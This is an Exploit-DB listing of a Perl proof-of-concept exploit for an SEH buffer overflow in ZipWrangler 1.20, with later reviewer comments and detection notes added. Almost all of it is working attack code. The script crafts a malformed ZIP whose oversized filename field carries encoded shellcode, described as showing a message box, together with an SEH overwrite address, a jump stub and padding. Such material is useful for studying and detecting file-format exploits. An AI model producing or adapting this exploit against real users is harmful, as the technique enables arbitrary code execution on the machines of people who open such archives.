ZipWrangler 1.20 – ‘.zip’ File (SEH)

  • 作者: TecR0c & Sud0
    日期: 2010-04-24
  • 类别:
    平台:
  • 来源: https://www.exploit-db.com/exploits/12368/
  • #!/usr/bin/perl
    # Title:ZipWrangler 1.20 (.zip) SEH 0day exploit
    # Author: TecR0c & Sud0
    # Date: April 24th, 2010
    # Corelan Reference:http://www.corelan.be:8800/advisories.php?id=CORELAN-10-031
    # Download: http://www.softpedia.com/get/Compression-tools/ZipWrangler.shtml
    # Platform: Windows XP sp3 En (VMWARE)
    # Greetz to:Corelan Security Team
    # http://www.corelan.be:8800/index.php/security/corelan-team-members/
    #
    # Script provided 'as is', without any warranty.
    # Use for educational purposes only.
    # Do not use this code to do anything illegal !
    # Corelan does not want anyone to use this script
    # for malicious and/or illegal purposes.
    # Corelan cannot be held responsible for any illegal use.
    #
    # Note : you are not allowed to edit/modify this code.
    # If you do, Corelan cannot be held responsible for any damages this may cause.
    
    # Reviewer summary of what the script writes (derived from the code below):
    #   wrangler.zip = local file header (30 bytes)
    #                + $payload (4168 bytes = 4164-byte $shellcode . ".txt")
    #                + central directory file header (46 bytes)
    #                + $payload again
    #                + end-of-central-directory record (22 bytes)
    # Both headers declare a filename length of 0x1048 = 4168, so the whole
    # $payload is parsed by the reader as the single entry's *filename*; the
    # CRC32 and both size fields are zero.  For detection/triage of archives of
    # this kind, the combination of a single entry, an oversized filename length
    # whose bytes are not all printable, and zero CRC/size fields is what sets
    # the file apart from a benign archive.
    #
    # Script hygiene (code left unchanged here): no `use strict`/`use warnings`;
    # `system("del ...")` runs through the shell, is Windows-only and its return
    # value is unchecked; `open` is the 2-arg form on a bareword handle with no
    # error check and no `binmode` (the bytes written below include no 0x0A, so
    # text-mode translation on Windows happens not to change the output).
    
    print "|-------------------------------------------------------------------|\n";
    print "| __ __ |\n";
    print "| _________________/ /___ _____ / /________ _____ ___ |\n";
    print "|/ ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \|\n";
    print "| / /__/ /_/ / //__/ / /_/ / / / // /_/__/ /_/ / / / / / /|\n";
    print "| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ |\n";
    print "| |\n";
    print "| http://www.corelan.be:8800|\n";
    print "|security@corelan.be|\n";
    print "| |\n";
    print "|-------------------------------------------------[ EIP Hunters ]---|\n";
    print "[+] ZipWrangler 1.2 (.zip) SEH exploit\n";
    
    
    
    # Local file header: 30 bytes in total, all multi-byte fields little-endian.
    my $ldf_header = "\x50\x4B\x03\x04". # local file header signature ("PK\x03\x04")
    "\x14\x00". # version minimum needed to extract
    "\x00\x00". #general purpose bit flag
    "\x00\x00". #compression method (0 = stored)
    "\xB7\xAC". #file last modification time
    "\xCE\x34". # file last modification date
    "\x00\x00\x00\x00". #CRC32 (zero)
    "\x00\x00\x00\x00". #Compressed size (zero)
    "\x00\x00\x00\x00" . #Uncompressed Size (zero)
    "\x48\x10" . # filename length: 0x1048 = 4168 = length($payload) below (an older "E4 0F" note stood here; 0x0FE4 = 4068 does not match the payload)
    "\x00\x00"; #Extra field length
    
    
    # Central directory file header: 46 bytes in total; size/CRC/filename-length
    # fields mirror the local header above.
    my $cdf_header = "\x50\x4B\x01\x02". #central directory file header signature ("PK\x01\x02")
    "\x14\x00".#version made by
    "\x14\x00".#version needed to extract
    "\x00\x00".#general purpose bit flag
    "\x00\x00".#Compression method (0 = stored)
    "\xB7\xAC".#File last modification time
    "\xCE\x34".#File last modification date
    "\x00\x00\x00\x00". #CRC32 (zero, as in the local header)
    "\x00\x00\x00\x00".#Compressed Size (zero)
    "\x00\x00\x00\x00".#Uncompressed Size (zero)
    "\x48\x10". # filename length: 0x1048 = 4168, same value as the local header
    "\x00\x00". #Extra Field Length
    "\x00\x00". #File comment length
    "\x00\x00". #Disk number where File starts
    "\x01\x00". #Internal File Attributes
    "\x24\x00\x00\x00". #External File Attributes
    "\x00\x00\x00\x00"; #Relative offset of local file header (0: the local header is the first thing written)
    
    # End-of-central-directory record: 22 bytes in total; the two 32-bit values
    # are computed from the 30/46-byte header sizes and the 4168-byte payload.
    my $eofcdf_header = "\x50\x4B\x05\x06". #End of central Directory Signature ("PK\x05\x06")
    "\x00\x00". #Number of this disk
    "\x00\x00". #Disk where central directory starts
    "\x01\x00". #Number of central directory records on this Disk
    "\x01\x00". #Total Number of central directory records
    "\x76\x10\x00\x00". #Size of central directory: 0x1076 = 4214 = 46-byte central directory header + 4168-byte payload
    "\x66\x10\x00\x00". # Offset of start of central directory, relative to start of archive: 0x1066 = 4198 = 30-byte local header + 4168-byte payload
    "\x00\x00"; #Zip file Comment length
    
    #mov edx, ds :[EAX] ---> the address 0x7FFDFD0C = 00000 in DS
    #so EDX=0000, next instruction TEST EDX,EDX/ Jz xxxxxx (will bypass the error due to mov ECX, ds:[edx])
    #the jump will take us to a retn (so we are out from handler routine) --> come back to execution
    #0x77E9025B [rpcrt4.dll] will overwrite EIP after being back from exception
    #bingo , after \xEB\x06 we are in our \xcc
    # shell = message box eax e
    
    # $shell: a printable, alphanumeric-only string (per the note above, it
    # displays a message box); its length is only used for padding below.
    my $shell="PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8" .
    "ABuJIn9JKmK9IT4tdl4tqzrmbpzUaIYcTNkpqfPlKD66lNkpvwlLKsvgx" .
    "lKsNepNkEf4xpO4XPul3qIs1KaKOKQapLK2LgT14lKsuUlNkpTgurX6aZ" .
    "JLK1ZwhLKCjepUQzKm3p7W9LKp4nkwqzNp1kOvQKpKLLlmTo0BTTJZahO4" .
    "MuQKwxihqKOKOIoWKQlQ4Ux2UyNNkcjq4uQJKsVNk6lpKnkrzuL5QXkLKV" .
    "dNkWqM8K9qT5tglE1XC82C8EyYDNi8eMY9RCXlNpN4NhlbryxMLKOKOKOl" .
    "IqUfdOKQnN8YrPsMW7lddV2KXlKIoyoKOoycueXQxplPlEpkO3XP3VRfNu" .
    "4qxpupscUcBK8qLutWzOyIvpVyoaEETMYO2pPMkoXY22mOLOwwlWTf2kXa" .
    "NKOYokOSXPlpapnV83XQsbOT255P1kkoxaLQ4TGniKSBHQtShWPUpax0op" .
    "iCD55PhpeqhRPbLUaJiNh2lEteYOykQdqKbSbQCv12rKOXP6QO0pPKOSeV" .
    "h5ZA";
    
    # $shellcode: "A" x 2 . $shell . "A" padding brings the prefix to exactly
    # 4080 bytes regardless of length($shell); then 4 + 4 + 4 + 8 + 5 + 59 more
    # bytes (the two 4-byte values discussed in the notes above, NOP bytes, a
    # 5-byte stub and 59 x 0xCC) give 4164 bytes in total.
    my $shellcode="A" x 2 . $shell . "A" x (4080-2-length($shell)) . "\x0C\xFD\xFD\x7F" . "\x90" x 4 . "\x5b\x02\xe9\x77" . "\x90" x 8 . "\x83\xC0\x16\xFF\xE0"."\xcc" x 59;
    my $filename="wrangler.zip";   # output archive, written to the current directory
    
    # $payload is used as the entry's filename: 4164 + 4 = 4168 bytes, which is
    # the 0x1048 encoded in both filename-length fields above.
    my $payload = $shellcode . ".txt";
    
    print "Size : " . length($payload)."\n";   # prints 4168
    print "Removing old $filename file\n";
    system("del $filename");   # Windows shell command, return value unchecked; `unlink $filename` would be the portable, shell-free equivalent
    print "Creating new $filename file\n";
    open(FILE, ">$filename");   # 2-arg open on a bareword handle, unchecked, no binmode (see hygiene note at the top)
    
    print FILE $ldf_header . $payload . $cdf_header . $payload . $eofcdf_header;   # local header, entry name, central directory, EOCD
    close(FILE);   # unchecked: a buffered write failure would go unnoticed